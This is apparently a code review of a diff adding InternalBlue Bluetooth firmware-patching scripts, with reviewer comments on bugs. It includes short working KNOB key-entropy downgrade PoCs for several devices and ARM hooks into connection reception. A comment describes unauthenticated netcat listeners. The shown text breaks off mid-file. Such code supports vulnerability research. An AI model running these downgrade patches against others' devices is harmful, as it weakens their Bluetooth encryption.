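Review bot: the serial-forwarding fallback documented in this hunk starts `nc -l -p 8872` and `nc -l -p 8873` as unauthenticated listeners on the phone, one serving the HCI snoop log and the other writing whatever it receives straight into the file that is appended to `/dev/ttySAC1`; the README should state that these ports are meant to be reached only through ADB port forwarding and not exposed on a shared network, and how the three processes are cleaned up when a session ends. Minor: the "none | Android 8+9" table row should explain that "none" means no prebuilt library is needed for this path.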
+44 -6
@@ -1,10 +1,48 @@
InternalBlue PoCs and Examples
==============================
All examples were tested on a *Nexus 5* (*BCM4339* chip with firmware *BCM4335C0*) on *Android* and *LineageOS*.
* [CVE_2018_5383_Invalid_Curve_Attack_PoC](CVE_2018_5383_Invalid_Curve_Attack_PoC.py)
provides tries to set the y-coordinate during ECDH key exchange to zero. If the device under test accepts the pairing (50% probability), it is vulnerable.
* [LMP_MAC_Address_Filter](LMP_MAC_Address_Filter.py)
replies to all LMP packets with `LMP_not_accepted` if their source is not from a MAC address in the whitelist.
* [NiNo_PoC](NiNo_PoC.py) sets the IO capabilities of the *Nexus 5* to no input, no output.
KNOB Attack Test (CVE-2019-9506)
--------------------------------
We provide a modified version of the KNOB attack test, originally provided [here](https://github.com/francozappa/knob).
This script tests if the other device will accept a reduced key entropy of 1 byte instead of the optimal 16 byte.
Available for the [Raspberry Pi 3](rpi3/KNOB_PoC.py), [Raspberry Pi 3+/4](rpi3p_rpi4/KNOB_PoC.py),
[Nexus 5](nexus5/KNOB_PoC.py), [Nexus 6P](nexus6p/KNOB_PoC.py), [CYW20735 evaluation board](eval_cyw20735/KNOB_PoC.py),
and [Samsung Galaxy S8](s8/KNOB_PoC.py).
Invalid Curve Attack Test (CVE-2018-5383)
-----------------------------------------
This is a test which tires to set the y-coordinate during ECDH key exchange to zero. If the devie under test accepts the pairing
(50% probability), it is vulnerable. This is not an MITM implementation, it only tests, if the other device would be vulnerable in practice.
Available for the [Nexus 5](nexus5/CVE_2018_5383_Invalid_Curve_Attack_PoC.py).
LMP MAC Address Filter
----------------------
Only accept traffic from whitelisted MAC addresses and send `LMP_not_accepted` otherwise.
Available for the [Nexus 5](nexus5/LMP_MAC_Address_Filter.py).
NiNo Attack Test
----------------
Prior to pairing, an MITM can set the IO capabilities to no input, no output. This will skip the numeric comparison.
If the operating system displays a yes/no question during pairing, a warning, or similar, is up to the concrete implementation.
This script tests how the other device will behave in a pairing that does not use numeric comparison, but is no
active MITM attack.
Available for the [Nexus 5](nexus5/NiNo_PoC.py).
Measurement of BLE Receive Statistics
-------------------------------------
This demo provides a hook within the callback for BLE packet reception. Upon packet reception, no matter if the
packet is a keep-alive null packet or not, it will be processed by this function. During this state, further
metadata is available, such as the RSSI (Received Signal Strength Indicator), the packet's channel, and the
currently active channel map.
Available for the [Nexus 5](nexus5/BLE_Reception_PoC.py) and [Samsung Galaxy S8](s8/BLE_Reception_PoC.py) including a callback script,
as well as for the [CYW20735 Evaluation board](eval_cyw20735/BLE_Reception_PoC.py), [Raspberry Pi 3](rpi3/BLE_Reception_PoC.py)
and [3+/4](rpi3p_rpi4/BLE_Reception_PoC.py) currently without callback script.
We also ported it for the iPhone 6, however, the current *InternalBlue* iOS implementation cannot be run in parallel
with the full iOS stack, thus it is not pushed online here.
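Review bot: Typos in the Invalid Curve Attack Test section: "tires" should be "tries", "devie" should be "device", and the first bullet's "provides tries to set the y-coordinate" reads as if a word was dropped. The bullet list at the top links CVE_2018_5383_Invalid_Curve_Attack_PoC.py, LMP_MAC_Address_Filter.py and NiNo_PoC.py in the examples root, while the sections below link the same scripts under nexus5/; keep one location so the links do not go stale. In the NiNo paragraph, "If the operating system displays a yes/no question ... is up to the concrete implementation" should read "Whether the operating system displays ...", and "16 byte" in the KNOB section should be "16 bytes".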
@@ -0,0 +1,47 @@
#!/usr/bin/python2
from pwn import *
from internalblue.adbcore import ADBCore
from internalblue.bluezcore import BluezCore
"""
Script that shows receive statistics from LE connections over HCI on the CYW20735B1 evaluation board.
Generated with Nexmon.
"""
internalblue = ADBCore()
try:
internalblue.interface = internalblue.device_list()[0][1] # just use the first Android device
except IndexError:
internalblue = BluezCore()
try:
internalblue.interface = internalblue.device_list()[0][1] # ...or the first local HCI interface
except IndexError:
log.critical("Adapt the Python script to use an available Broadcom Bluetooth interface.")
exit(-1)
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
progress_log = log.info("Connected to first target, installing patches...")
# GENERATED PATCHES
internalblue.patchRom(0x0008ea46, '\x89\xf1\x5b\xbc')
internalblue.patchRom(0x0008edc2, '\x89\xf1\x1d\xbc')
internalblue.patchRom(0x0008eec0, '\x89\xf1\x1e\xbb')
internalblue.writeMem(0x00218200, '\x10\xb5\xcc\x22\xff\x21\xce\x20\x0c\xf6\x43\xfe\x04\x46\x04\x22\x07\x49\x0a\x30\x50\xf6\x53\xfb\x06\x4b\x04\xf1\x0e\x00\x19\x68\xc8\x22\x50\xf6\x4c\xfb\x20\x46\xbd\xe8\x10\x40\x0c\xf6\x03\xbd\x18\x80\x21\x00\x80\x28\x28\x00')
internalblue.writeMem(0x00218300, '\x95\xf6\x70\xfc\xff\xf7\x7c\xff\x76\xf6\x9f\xbb\x00\xbf\x00\xbf')
internalblue.writeMem(0x00218500, '\x2d\xe9\xf0\x5f\xfe\xb5\x07\x46\xf3\x22\xff\x21\xf5\x20\x0c\xf6\xc0\xfc\x04\x46\x04\xf1\x0a\x03\x04\x22\x0f\x49\x18\x46\x50\xf6\xce\xf9\x04\xf1\x0e\x03\x4f\xf0\xef\x02\x39\x46\x18\x46\x50\xf6\xc6\xf9\x04\xf1\x0e\x03\x4f\xf0\x01\x02\x07\xf5\xe9\x71\x18\x46\x50\xf6\xbd\xf9\x20\x46\x0c\xf6\x76\xfb\x38\x46\xbd\xe8\xfe\x40\x76\xf6\xb8\xbc\x00\xbf\x00\xbf\x00\x80\x21\x00')
internalblue.writeMem(0x00218600, '\x70\xb5\x05\x46\xfe\xb5\x05\x46\xf4\x22\xff\x21\xf6\x20\x0c\xf6\x40\xfc\x04\x46\x04\xf1\x0a\x03\x04\x22\x0b\x49\x18\x46\x50\xf6\x4e\xf9\x04\xf1\x0e\x03\x4f\xf0\xf0\x02\x29\x46\x18\x46\x50\xf6\x46\xf9\x20\x46\x0c\xf6\xff\xfa\x00\xf0\xe2\xf8\xbd\xe8\xfe\x40\x76\xf6\xc1\xbb\x00\xbf\x00\xbf\x08\x80\x21\x00')
internalblue.writeMem(0x00218800, '\x10\xb5\x08\x22\x82\xb0\xff\x21\x0a\x20\x0c\xf6\x42\xfb\x04\x22\x04\x46\x0b\x49\x0a\x30\x50\xf6\x52\xf8\x00\x20\x9f\xf6\xec\xff\x95\xf6\x3f\xff\x02\xa9\x41\xf8\x04\x0d\x04\x22\x04\xf1\x0e\x00\x50\xf6\x45\xf8\x20\x46\x0c\xf6\xfe\xf9\x02\xb0\x10\xbd\x00\xbf\x10\x80\x21\x00')
internalblue.writeMem(0x00218000, '\x52\x58\x44\x4e\x00\x00\x00\x00\x4c\x45\x50\x52\x00\x00\x00\x00\x52\x53\x53\x49\x00\x00\x00\x00\x52\x42\x55\x46\x00')
# shutdown connection
internalblue.shutdown()
log.info("--------------------")
log.info("To see statistics, execute 'internalblue' and run 'log_level debug'.")
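Review bot: The docstring says this script targets the CYW20735B1 evaluation board, but it instantiates ADBCore first and only falls back to BluezCore, so on a host that also has an Android device attached the phone gets patched instead of the board; the KNOB script for the same board uses HCICore directly and this one should do the same (or take the core as an argument). `progress_log = log.info(...)` stores the return value of log.info, which is not a progress object; drop the assignment or use log.progress. The payloads passed to patchRom/writeMem are plain str literals such as '\x89\xf1\x5b\xbc'; since the rest of this change converts the package for Python 3 (`from future import standard_library` in adbcore, `from builtins import range` in the Nexus 5 script), these should be b'...' literals so they stay bytes.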
+48
View File
@@ -0,0 +1,48 @@
#!/usr/bin/python2
# Jiska Classen, Secure Mobile Networking Lab
from pwn import *
from internalblue.hcicore import HCICore
"""
This is a standalone PoC for the KNOB attack on a CYW20735 evaluation board.
Original LMP monitor mode was from Dennis Mantz, and was then modified by Daniele Antonioli for KNOB.
For details see https://github.com/francozappa/knob
This PoC is much shorter since it only modifies global variables for key entropy.
"""
internalblue = HCICore()
internalblue.interface = internalblue.device_list()[0][1] # just use the first device
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
log.info("Installing patch which ensures that send_LMP_encryptoin_key_size_req is always len=1!")
# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x7402A) # connection struct key entropy
internalblue.patchRom(0x7402A, patch)
# modify global variable for own setting
internalblue.writeMem(0x280F13, '\x01') # global key entropy
internalblue.shutdown()
exit(-1)
log.info("-----------------------\n"
"Installed KNOB PoC. If connections to other devices succeed, they are vulnerable to KNOB.\n"
"Monitoring device behavior is a bit tricky on Linux, LMP messages might appear in btmon.\n"
"For more details, see special instructions for BlueZ.\n")
+176
View File
@@ -0,0 +1,176 @@
#!/usr/bin/env python2
# Jiska Classen
# Get receive statistics on a Nexus 5 for BLE connection events
from builtins import range
from pwn import *
from internalblue.adbcore import ADBCore
import internalblue.hci as hci
import internalblue.cli as cli
internalblue = ADBCore(serial=False)
device_list = internalblue.device_list()
if len(device_list) == 0:
log.warn("No HCI devices connected!")
exit(-1)
internalblue.interface = device_list[0][1] # just use the first device
"""
# _connTaskRxDone has a Patchram position, Nexus 5 patches look so worse that I guess
# they never planned to support BLE. Even callbacks are defined in Patchram.
# You need to adjust the RX_DONE_HOOK_ADDRESS in the beginning.
"""
RX_DONE_HOOK_ADDRESS = 0x224DEA
HOOKS_LOCATION = 0xd7500
ASM_HOOKS = """
// restore first 4 bytes of _connTaskRxDone
push {r4-r8,lr}
mov r4, r0
// fix registers for our own routine
push {r1-r7, lr}
mov r7, r0
// allocate vendor specific hci event
mov r2, 243
mov r1, 0xff
mov r0, 245
bl 0x7AFC // bthci_event_AllocateEventAndFillHeader(4+239+2, 0xff, 4+239);
mov r4, r0 // save pointer to the buffer in r4
// append buffer with "RXDN"
add r0, 2 // buffer starts at 2 with data (?)
ldr r1, =0x4e445852 // RXDN
str r1, [r0]
add r0, 4 // advance buffer by 4
// copy 239 bytes of le_conn to buffer
mov r2, #238
mov r1, r7 // le_conn[0]
//add r1, 0x100 //TODO use this to access the connection struct with different offset
bl 0x46FE6 // __rt_memcpy
// for debugging purposes, we overwrite the first byte
// (which is the connTaskCallback anyway) with RSSI info
mov r2, #1 // 1 rssi byte
add.w r1, r7, #0x12c // le_conn[0x12c] is position of RSSI in Nexus 5
mov r0, r4
add r0, 6
bl 0x46FE6 // __rt_memcpy
// send hci event
mov r0, r4 // back to buffer at offset 0
bl 0x398c1 // send_hci_event_without_free()
// free HCI buffer
mov r0, r4
bl 0x3FA36 // osapi_blockPoolFree
// undo registers for our own routine
mov r0, r7
pop {r1-r7, lr}
// branch back to _connTaskRxDone + 4
b 0x%x
""" % (RX_DONE_HOOK_ADDRESS+4)
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
# Install hooks
code = asm(ASM_HOOKS, vma=HOOKS_LOCATION)
log.info("Writing hooks to 0x%x..." % HOOKS_LOCATION)
if not internalblue.writeMem(HOOKS_LOCATION, code):
log.critical("Cannot write hooks at 0x%x" % HOOKS_LOCATION)
exit(-1)
log.info("Installing hook patch...")
patch = asm("b 0x%x" % HOOKS_LOCATION, vma=RX_DONE_HOOK_ADDRESS)
if not internalblue.writeMem(RX_DONE_HOOK_ADDRESS, patch):
log.critical("Installing patch for _connTaskRxDone failed!")
exit(-1)
# RXDN statistics callback variables
internalblue.last_nesn_sn = None
internalblue.last_success_event = None
def lereceiveStatusCallback(record):
"""
RXDN Callback Function
Depends on the raspi3_rxdn.py or eval_rxdn.py script,
which patches the _connTaskRxDone() function and copies
info from the LE connection struct to HCI.
"""
hcipkt = record[0] # get HCI Event packet
if not issubclass(hcipkt.__class__, hci.HCI_Event):
return
if hcipkt.data[0:4] == "RXDN":
data = hcipkt.data[4:]
# Raspi 3 gets errors
if len(data) < 239:
return
# !!! Nexus 5 has really outdated struct...
packet_curr_nesn_sn = u8(data[0xa0])
packet_channel_map = data[0x4c:0x4c+38]
packet_channel = u8(data[0x7b])
packet_event_ctr = u16(data[0x86:0x88])
packet_rssi = u8(data[0])
if internalblue.last_nesn_sn and ((internalblue.last_nesn_sn ^ packet_curr_nesn_sn) & 0b1100) != 0b1100:
log.info(" ^----------------------------- ERROR --------------------------------")
# currently only supported by eval board: check if we also went into the process payload routine,
# which probably corresponds to a correct CRC
# if self.last_success_event and (self.last_success_event + 1) != packet_event_ctr:
# log.debug(" ^----------------------------- MISSED -------------------------------")
# TODO example for setting the channel map
# timeout needs to be zero, because we are already in an event reception routine!
# self.sendHciCommand(0x2014, '\x00\x00\xff\x00\x00', timeout=0)
internalblue.last_nesn_sn = packet_curr_nesn_sn
# draw channel with rssi color
color = '\033[92m' # green
if 0xc8 > packet_rssi >= 0xc0:
color = '\033[93m' # yellow
elif packet_rssi < 0xc0:
color = '\033[91m' # red
channels_total = u8(packet_channel_map[37])
channel_map = 0x0000000000
if channels_total <= 37: # raspi 3 messes up with this during blacklisting
for channel in range(0, channels_total):
channel_map |= (0b1 << 39) >> u8(packet_channel_map[channel])
log.info("LE event %5d, map %10x, RSSI %d: %s%s*\033[0m " % (packet_event_ctr, channel_map,
(packet_rssi & 0x7f) - (128 * (packet_rssi >> 7)),
color, ' ' * packet_channel))
log.info("--------------------")
log.info("Entering InternalBlue CLI to display statistics.")
# add RXDN callback
internalblue.registerHciCallback(lereceiveStatusCallback)
# enter CLI
cli.commandLoop(internalblue)
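Review bot: In lereceiveStatusCallback, `hcipkt.data[0:4] == "RXDN"` compares bytes against a str; under Python 3 (this file already carries `from builtins import range` from the futurize pass) that is always False, so the callback never prints a line. Compare against b"RXDN". The same applies to `u8(data[0xa0])`, `u8(data[0x7b])`, `u8(data[0])` and `u8(packet_channel_map[37])`: indexing bytes yields an int on Python 3, so u8() no longer receives a one-byte string; pass a one-byte slice such as `data[0xa0:0xa1]` or use the int directly. The docstring "Depends on the raspi3_rxdn.py or eval_rxdn.py script" is stale, since this script installs the _connTaskRxDone hook itself. The commented-out `self.last_success_event` and `self.sendHciCommand(...)` lines reference `self` inside a module-level function; either delete them or rewrite them against `internalblue`.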
+100
View File
@@ -0,0 +1,100 @@
#!/usr/bin/python2
# Jiska Classen, Secure Mobile Networking Lab
from pwn import *
from internalblue.adbcore import ADBCore
import internalblue.cli as cli
import internalblue.cmds as cmd
import internalblue.hci as hci
from internalblue.cmds import auto_int
"""
This is a standalone PoC for the KNOB attack on a Nexus 5.
Original LMP monitor mode was from Dennis Mantz, and was then modified by Daniele Antonioli for KNOB.
For details see https://github.com/francozappa/knob
This PoC is much shorter since it only modifies global variables for key entropy.
"""
internalblue = ADBCore(serial=False) # without custom bluetooth.default.so, change to True
internalblue.interface = internalblue.device_list()[0][1] # just use the first device
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
log.info("Installing patch which ensures that send_LMP_encryptoin_key_size_req is always len=1!")
# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x5AED0) # connection struct key entropy
internalblue.patchRom(0x5AED0, patch)
# modify global variable for own setting
internalblue.writeMem(0x203797, '\x01') # global key entropy
log.info("-----------------------KNOB-----------------------\n"
"Installed KNOB PoC. If connections to other devices succeed, they are vulnerable to KNOB.\n"
"To monitor device behavior, continue on the CLI, ideally with diagnostic LMP mode.\n"
"On Android, this requires a modified bluetooth.default.so.\n"
"-----------------------KNOB-----------------------\n"
"Automatically continuing on KNOB interface...\n"
"Use the 'knob' command to *debug* the attack, i.e.:\n"
" knob --hnd 0x0c\n"
"...shows the key size of handle 0x000c.\n")
class CmdKnob(cmd.Cmd):
"""
Introduce a new CLI command to make KNOB debugging easier...
"""
keywords = ["knob"]
description = "Debugs which key length is currently active within a connection handle."
parser = cmd.argparse.ArgumentParser(prog=keywords[0], description=description)
parser.add_argument("--hnd", type=auto_int, default=0x000c,
help="Handle KNOB connection.")
def work(self):
args = self.getArgs()
internalblue.sendHciCommand(0x1408, p16(args.hnd))
return True
def hciKnobCallback(record):
"""
Adds a new callback function so that we do not need to call Wireshark.
"""
hcipkt = record[0]
if not issubclass(hcipkt.__class__, hci.HCI_Event):
return
if hcipkt.event_code == 0x0e:
if u16(hcipkt.data[1:3]) == 0x1408: # Read Encryption Key Size
if u8(hcipkt.data[3]) == 0x12: # Error
log.info("No key size available.\n"
" - Did you already negotiate an encrypted connection?\n"
" - Did you choose the correct connection handle?\n")
else:
log.info("HCI_Read_Encryption_Key_Size result for handle 0x%x: %x" % (u16(hcipkt.data[4:6]), u8(hcipkt.data[6])))
return
# add our command
cmd.CmdKnob = CmdKnob
internalblue.registerHciCallback(hciKnobCallback)
# enter CLI
cli.commandLoop(internalblue)
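Review bot: In hciKnobCallback only status 0x12 is treated as an error; any other non-zero status byte in the Command Complete event (for example an unknown connection handle) falls into the else branch and is printed as if it were a key size. Check `u8(hcipkt.data[3]) != 0` and print the status code instead. `u8(hcipkt.data[3])` and `u8(hcipkt.data[6])` also hit the bytes-indexing-yields-int problem on Python 3, and '\x01' should be a bytes literal. "encryptoin" in the log message should be "encryption". `cmd.CmdKnob = CmdKnob` relies on the CLI discovering commands by scanning the cmds module's attributes; a one-line comment saying so would spare the next reader from wondering why the class is never referenced.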
+100
View File
@@ -0,0 +1,100 @@
#!/usr/bin/python2
# Jiska Classen, Secure Mobile Networking Lab
from pwn import *
from internalblue.adbcore import ADBCore
import internalblue.cli as cli
import internalblue.cmds as cmd
import internalblue.hci as hci
from internalblue.cmds import auto_int
"""
This is a standalone PoC for the KNOB attack on a Nexus 6P.
Original LMP monitor mode was from Dennis Mantz, and was then modified by Daniele Antonioli for KNOB.
For details see https://github.com/francozappa/knob
This PoC is much shorter since it only modifies global variables for key entropy.
"""
internalblue = ADBCore(serial=False) # without custom bluetooth.default.so, change to True
internalblue.interface = internalblue.device_list()[0][1] # just use the first device
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
log.info("Installing patch which ensures that send_LMP_encryption_key_size_req is always len=1!")
# modify function lm_SendLmpEncryptKeySizeReq
#patch = asm("mov r2, #0x1", vma=0x4BC6E) # connection struct key entropy
#internalblue.patchRom(0x4BC6E, patch)
# this somehow crashes on the Nexus 6P, but the global variable seems to be sufficient :)
# modify global variable for own setting
internalblue.writeMem(0x204147, '\x01') # global key entropy
log.info("-----------------------KNOB-----------------------\n"
"Installed KNOB PoC. If connections to other devices succeed, they are vulnerable to KNOB.\n"
"To monitor device behavior, continue on the CLI, ideally with diagnostic LMP mode.\n"
"On Android, this requires a modified bluetooth.default.so.\n"
"-----------------------KNOB-----------------------\n"
"Automatically continuing on KNOB interface...\n"
"Use the 'knob' command to *debug* the attack, i.e.:\n"
" knob --hnd 0x0b\n"
"...shows the key size of handle 0x000b.\n")
class CmdKnob(cmd.Cmd):
"""
Introduce a new CLI command to make KNOB debugging easier...
"""
keywords = ["knob"]
description = "Debugs which key length is currently active within a connection handle."
parser = cmd.argparse.ArgumentParser(prog=keywords[0], description=description)
parser.add_argument("--hnd", type=auto_int, default=0x000c,
help="Handle KNOB connection.")
def work(self):
args = self.getArgs()
internalblue.sendHciCommand(0x1408, p16(args.hnd))
return True
def hciKnobCallback(record):
"""
Adds a new callback function so that we do not need to call Wireshark.
"""
hcipkt = record[0]
if not issubclass(hcipkt.__class__, hci.HCI_Event):
return
if hcipkt.event_code == 0x0e:
if u16(hcipkt.data[1:3]) == 0x1408: # Read Encryption Key Size
if u8(hcipkt.data[3]) == 0x12: # Error
log.info("No key size available.\n"
" - Did you already negotiate an encrypted connection?\n"
" - Did you choose the correct connection handle?\n")
else:
log.info("HCI_Read_Encryption_Key_Size result for handle 0x%x: %x" % (u16(hcipkt.data[4:6]), u8(hcipkt.data[6])))
return
# add our command
cmd.CmdKnob = CmdKnob
internalblue.registerHciCallback(hciKnobCallback)
# enter CLI
cli.commandLoop(internalblue)
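Review bot: The banner tells the user to run `knob --hnd 0x0b` for handle 0x000b, but the parser default is still 0x000c (copied from the Nexus 5 script); pick one so the documented default matches the code. The commented-out patchRom at 0x4BC6E with "this somehow crashes on the Nexus 6P" should say whether the global-variable write alone was verified to reduce the negotiated key size to one byte, otherwise it is unclear whether this PoC is complete. The status check in hciKnobCallback has the same gap as the Nexus 5 script: only 0x12 is treated as an error.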
+90
View File
@@ -0,0 +1,90 @@
#!/usr/bin/env python2
# Jiska Classen
# Get receive statistics on a Raspberry Pi 3 for BLE connection events
from pwn import *
from internalblue.hcicore import HCICore
internalblue = HCICore()
device_list = internalblue.device_list()
if len(device_list) == 0:
log.warn("No HCI devices connected!")
exit(-1)
internalblue.interface = device_list[0][1] # just use the first device
RX_DONE_HOOK_ADDRESS = 0x35fbc # _connTaskRxDone
HOOKS_LOCATION = 0x210500
ASM_HOOKS = """
// restore first 4 bytes of _connTaskRxDone
push {r4-r6,lr}
mov r4, r0
// fix registers for our own routine
push {r1-r7, lr}
mov r7, r0
// allocate vendor specific hci event
mov r2, 243
mov r1, 0xff
mov r0, 245
bl 0x3670 // bthci_event_AllocateEventAndFillHeader(4+239+2, 0xff, 4+239);
mov r4, r0 // save pointer to the buffer in r4
// append buffer with "RXDN"
add r0, 10 // buffer starts at 10 with data
ldr r1, =0x4e445852 // RXDN
str r1, [r0]
add r0, 4 // advance buffer by 4
// copy 239 bytes of le_conn to buffer
mov r2, #238
mov r1, r7 // le_conn[0]
bl 0x45824 // __rt_memcpy
// for debugging purposes, we overwrite the first byte
// (which is the connTaskCallback anyway) with RSSI info
mov r2, #1 // 1 rssi byte
add.w r1, r7, #0x10a // le_conn[0x10a] is position of rssi
mov r0, r4
add r0, 14
bl 0x45824 // __rt_memcpy
// send hci event
mov r0, r4 // back to buffer at offset 0
bl 0x358e // send_hci_event
// undo registers for our own routine
mov r0, r7
pop {r1-r7, lr}
// branch back to _connTaskRxDone + 4
b 0x35fc0
"""
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
# Install hooks
code = asm(ASM_HOOKS, vma=HOOKS_LOCATION)
log.info("Writing hooks to 0x%x..." % HOOKS_LOCATION)
if not internalblue.writeMem(HOOKS_LOCATION, code):
log.critical("Cannot write hooks at 0x%x" % HOOKS_LOCATION)
exit(-1)
log.info("Installing hook patch...")
patch = asm("b 0x%x" % HOOKS_LOCATION, vma=RX_DONE_HOOK_ADDRESS)
if not internalblue.patchRom(RX_DONE_HOOK_ADDRESS, patch):
log.critical("Installing patch for _connTaskRxDone failed!")
exit(-1)
log.info("--------------------")
log.info("To see statistics, execute 'internalblue' and run 'log_level debug'.")
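Review bot: The branch back at the end of ASM_HOOKS is hardcoded as `b 0x35fc0` while RX_DONE_HOOK_ADDRESS is a named constant two lines above; format it as `"b 0x%x" % (RX_DONE_HOOK_ADDRESS + 4)` like the Nexus 5 and S8 variants, so changing the hook address cannot silently leave the branch pointing into the old function. The script also never calls shutdown() before exiting, unlike the KNOB scripts; either add it or say in the final message that the connection is left open on purpose.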
+48
View File
@@ -0,0 +1,48 @@
#!/usr/bin/python2
# Jiska Classen, Secure Mobile Networking Lab
from pwn import *
from internalblue.hcicore import HCICore
"""
This is a standalone PoC for the KNOB attack on a Raspberry Pi 3.
Original LMP monitor mode was from Dennis Mantz, and was then modified by Daniele Antonioli for KNOB.
For details see https://github.com/francozappa/knob
This PoC is much shorter since it only modifies global variables for key entropy.
"""
internalblue = HCICore()
internalblue.interface = internalblue.device_list()[0][1] # just use the first device
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
log.info("Installing patch which ensures that send_LMP_encryptoin_key_size_req is always len=1!")
# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x689F0) # connection struct key entropy
internalblue.patchRom(0x689F0, patch)
# modify global variable for own setting
internalblue.writeMem(0x204127, '\x01') # global key entropy
internalblue.shutdown()
exit(-1)
log.info("-----------------------\n"
"Installed KNOB PoC. If connections to other devices succeed, they are vulnerable to KNOB.\n"
"Monitoring device behavior is a bit tricky on Linux, LMP messages might appear in btmon.\n"
"For more details, see special instructions for BlueZ.\n")
+90
View File
@@ -0,0 +1,90 @@
#!/usr/bin/env python2
# Jiska Classen
# Get receive statistics on a Raspberry Pi 3 for BLE connection events
from pwn import *
from internalblue.hcicore import HCICore
internalblue = HCICore()
device_list = internalblue.device_list()
if len(device_list) == 0:
log.warn("No HCI devices connected!")
exit(-1)
internalblue.interface = device_list[0][1] # just use the first device
RX_DONE_HOOK_ADDRESS = 0x56622 # _connTaskRxDone
HOOKS_LOCATION = 0x210500
ASM_HOOKS = """
// restore first 4 bytes of _connTaskRxDone
push {r4-r6,lr}
mov r4, r0
// fix registers for our own routine
push {r1-r7, lr}
mov r7, r0
// allocate vendor specific hci event
mov r2, 243
mov r1, 0xff
mov r0, 245
bl 0x2770 // bthci_event_AllocateEventAndFillHeader(4+239+2, 0xff, 4+239);
mov r4, r0 // save pointer to the buffer in r4
// append buffer with "RXDN"
add r0, 10 // buffer starts at 10 with data
ldr r1, =0x4e445852 // RXDN
str r1, [r0]
add r0, 4 // advance buffer by 4
// copy 239 bytes of le_conn to buffer
mov r2, #238
mov r1, r7 // le_conn[0]
bl 0x775C8 // __rt_memcpy
// for debugging purposes, we overwrite the first byte
// (which is the connTaskCallback anyway) with RSSI info
mov r2, #1 // 1 rssi byte
add.w r1, r7, #0x10a // le_conn[0x10a] is position of rssi
mov r0, r4
add r0, 14
bl 0x775C8 // __rt_memcpy
// send hci event
mov r0, r4 // back to buffer at offset 0
bl 0x268E // send_hci_event
// undo registers for our own routine
mov r0, r7
pop {r1-r7, lr}
// branch back to _connTaskRxDone + 4
b 0x56626
"""
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
# Install hooks
code = asm(ASM_HOOKS, vma=HOOKS_LOCATION)
log.info("Writing hooks to 0x%x..." % HOOKS_LOCATION)
if not internalblue.writeMem(HOOKS_LOCATION, code):
log.critical("Cannot write hooks at 0x%x" % HOOKS_LOCATION)
exit(-1)
log.info("Installing hook patch...")
patch = asm("b 0x%x" % HOOKS_LOCATION, vma=RX_DONE_HOOK_ADDRESS)
if not internalblue.patchRom(RX_DONE_HOOK_ADDRESS, patch):
log.critical("Installing patch for _connTaskRxDone failed!")
exit(-1)
log.info("--------------------")
log.info("To see statistics, execute 'internalblue' and run 'log_level debug'.")
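Review bot: The header comment says "Raspberry Pi 3", but this appears to be the Raspberry Pi 3+/4 variant (it follows the rpi3 script and uses different firmware addresses: 0x56622, 0x2770, 0x775C8, 0x268E); update the comment so the two files are not confused when copied. As in the rpi3 script, the return branch `b 0x56626` is hardcoded instead of being derived from RX_DONE_HOOK_ADDRESS + 4, and shutdown() is never called before the script exits.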
+48
View File
@@ -0,0 +1,48 @@
#!/usr/bin/python2
# Jiska Classen, Secure Mobile Networking Lab
from pwn import *
from internalblue.hcicore import HCICore
"""
This is a standalone PoC for the KNOB attack on a Raspberry Pi 3+/4.
Original LMP monitor mode was from Dennis Mantz, and was then modified by Daniele Antonioli for KNOB.
For details see https://github.com/francozappa/knob
This PoC is much shorter since it only modifies global variables for key entropy.
"""
internalblue = HCICore()
internalblue.interface = internalblue.device_list()[0][1] # just use the first device
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
log.info("Installing patch which ensures that send_LMP_encryptoin_key_size_req is always len=1!")
# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x3B3D4) # connection struct key entropy
internalblue.patchRom(0x3B3D4, patch)
# modify global variable for own setting
internalblue.writeMem(0x204A5F, '\x01') # global key entropy
internalblue.shutdown()
exit(-1)
log.info("-----------------------\n"
"Installed KNOB PoC. If connections to other devices succeed, they are vulnerable to KNOB.\n"
"Monitoring device behavior is a bit tricky on Linux, LMP messages might appear in btmon.\n"
"For more details, see special instructions for BlueZ.\n")
+179
View File
@@ -0,0 +1,179 @@
#!/usr/bin/env python2
# Jiska Classen
# Get receive statistics on a Samsung Galaxy S8 for BLE connection events
from builtins import range
from pwn import *
from internalblue.adbcore import ADBCore
import internalblue.hci as hci
import internalblue.cli as cli
internalblue = ADBCore(serial=True)
device_list = internalblue.device_list()
if len(device_list) == 0:
log.warn("No HCI devices connected!")
exit(-1)
internalblue.interface = device_list[0][1] # just use the first device
"""
# _connTaskRxDone has a Patchram position, S8 fixed almost everything in BLE, because
# they had to for Bluetooth 5 compliance.
# The base address is 0x5E324, and this will jump into the Patchram.
# You need to adjust the RX_DONE_HOOK_ADDRESS in the beginning.
"""
#RX_DONE_HOOK_ADDRESS = 0x1344D0 # on S8 with Patchlevel May 1 2019 on stock ROM
#RX_DONE_HOOK_ADDRESS = 0x134500 # on S8 with Lineage OS Nightly from August 30 2019
RX_DONE_HOOK_ADDRESS = 0x134514 # on S8 with Patchlevel September 1 2019 on stock ROM
HOOKS_LOCATION = 0x210500
ASM_HOOKS = """
// restore first 4 bytes of _connTaskRxDone
push {r4-r12,lr}
mov r4, r0
// fix registers for our own routine
push {r1-r7, lr}
mov r7, r0
// allocate vendor specific hci event
mov r2, 243
mov r1, 0xff
mov r0, 245
bl 0xE628 // bthci_event_AllocateEventAndFillHeader(4+239+2, 0xff, 4+239);
mov r4, r0 // save pointer to the buffer in r4
// append buffer with "RXDN"
add r0, 10 // buffer starts at 10 with data
ldr r1, =0x4e445852 // RXDN
str r1, [r0]
add r0, 4 // advance buffer by 4
// copy 239 bytes of le_conn to buffer
mov r2, #238
mov r1, r7 // le_conn[0]
bl 0x857B4 // __rt_memcpy
// for debugging purposes, we overwrite the first byte
